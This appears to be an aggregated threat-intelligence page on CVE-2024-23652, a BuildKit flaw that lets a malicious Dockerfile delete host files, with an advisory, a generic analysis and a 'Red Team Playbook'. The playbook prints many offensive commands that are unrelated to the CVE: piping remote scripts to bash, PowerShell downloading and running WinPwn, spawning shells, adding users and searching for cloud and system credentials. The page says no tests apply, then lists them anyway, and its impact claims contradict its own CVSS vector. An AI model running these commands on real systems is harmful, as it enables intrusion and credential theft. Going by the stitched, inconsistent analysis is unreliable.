CVE-2024-23652
Overview
This vulnerability is a directory traversal flaw (CWE-22) within the BuildKit component of moby buildkit. The root cause lies in improper handling of empty files created for mountpoints in the RUN --mount feature of Dockerfiles, where the mechanism intended to remove these empty files mistakenly removes files outside the container filesystem on the host. This flaw exists in the BuildKit frontend processing logic that manages mountpoint cleanup.
Vulnerability Description
BuildKit is a toolkit for converting source code to build artifacts in an efficient, expressive and repeatable manner. A malicious BuildKit frontend or Dockerfile using RUN --mount could trick the feature that removes empty files created for the mountpoints into removing a file outside the container, from the host system. The issue has been fixed in v0.12.5. Workarounds include avoiding using BuildKit frontends from an untrusted source or building an untrusted Dockerfile containing RUN --mount feature.
Impact
An unauthenticated attacker who can supply or control a BuildKit frontend or Dockerfile can exploit this vulnerability to delete arbitrary files on the host system outside the container environment. This can lead to denial of service or manipulation of host files, impacting system integrity and availability. The attack requires no user interaction or privileges (CVSS vector AV:N/AC:L/PR:N/UI:N) and affects the confidentiality and availability of the host (S:C, I:H, A:H).
Solution
Upgrade moby buildkit to version 0.12.5 or later, where the vulnerability is fixed as per the official advisory (https://github.com/moby/buildkit/security/advisories/GHSA-4v98-7qmw-rqr8). As a workaround, avoid using BuildKit frontends from untrusted sources or building untrusted Dockerfiles that utilize the RUN --mount feature until the patch is applied. Refer to the vendor’s patch pull request (https://github.com/moby/buildkit/pull/4603) for technical details on the fix implementation.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the BuildKit toolkit arises from a flaw in the handling of mountpoints during the build process, specifically when utilizing the RUN --mount feature in Dockerfiles. This feature is designed to enhance the efficiency of builds by allowing temporary mounts of files or directories from the host system into the container environment. However, a maliciously crafted BuildKit frontend or Dockerfile can exploit this functionality to manipulate the build process in a way that causes the removal of files from the host system, rather than just within the container. This occurs due to a failure in properly isolating the context of the mountpoints, leading to unintended file deletions that can compromise the integrity of the host environment.
Attack vectors for this vulnerability are particularly concerning, as they can be executed by any user with the ability to create or modify Dockerfiles that leverage BuildKit. An attacker could craft a Dockerfile that appears benign but includes the RUN --mount command to target sensitive files on the host system. For instance, an attacker might use this technique to delete critical configuration files or other important data, effectively disrupting operations or causing data loss. Additionally, the risk escalates in environments where BuildKit is used to automate build processes, as automated systems may inadvertently execute untrusted Dockerfiles without adequate scrutiny, amplifying the potential for widespread damage.
The real-world impact of this vulnerability can be severe, particularly for organizations that rely heavily on containerization and automated build processes. Businesses may face significant operational risks, including data loss, service disruption, and potential breaches of compliance regulations. The financial implications could also be substantial, as organizations may incur costs related to incident response, recovery efforts, and reputational damage. Furthermore, the exploitation of this vulnerability could lead to unauthorized access to sensitive information, which could have legal ramifications and erode customer trust.
To detect and mitigate the risks associated with this vulnerability, organizations should adopt a multi-faceted approach. First and foremost, it is crucial to ensure that all instances of BuildKit are updated to the latest version, where this vulnerability has been addressed. Additionally, implementing strict access controls and permissions for users who can create or modify Dockerfiles is essential to prevent unauthorized modifications. Organizations should also conduct regular audits of Dockerfiles and build processes to identify any potentially malicious code or configurations. Employing security tools that can analyze Docker images and detect vulnerabilities can further enhance the security posture.
In conclusion, the vulnerability within the BuildKit toolkit presents a significant threat to the integrity of host systems when using containerization technologies. The potential for exploitation through malicious Dockerfiles underscores the need for vigilance in managing build environments. By adopting robust detection and mitigation strategies, organizations can safeguard their systems against this and similar vulnerabilities, ensuring the reliability and security of their containerized applications.
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2024-23652, with a recent emergence of new exploitation attempts targeting vulnerable BuildKit environments. While the overall EPSS score remains stable, the slight upward adjustment reflects growing adversary interest and potential for exploitation. This trend is significant because it indicates that threat actors are increasingly leveraging the RUN --mount misuse vector to escape container isolation and impact host systems, elevating the risk to organizations relying on containerized build pipelines. The absence of widely adopted proof-of-concept exploits suggests that while exploitation is still in early stages, the sharp increase in detection signals a narrowing window for defenders to strengthen monitoring and detection capabilities before more sophisticated attacks materialize. Consequently, the threat level associated with this vulnerability should be considered elevated, warranting heightened vigilance in environments utilizing BuildKit, especially where untrusted frontends or Dockerfiles are involved.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Mobyproject | Buildkit | All |
cpe:2.3:a:mobyproject:buildkit:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
abian2/CVE-2024-23652
|
abian2 | 2 | 0 | 2024-03-01 | View |
Threat Feed
4 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-23652 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/moby/buildkit/security/advisories/GHSA-4v98-7qmw-rqr8 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/moby/buildkit/pull/4603 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/moby/buildkit/releases/tag/v0.12.5 |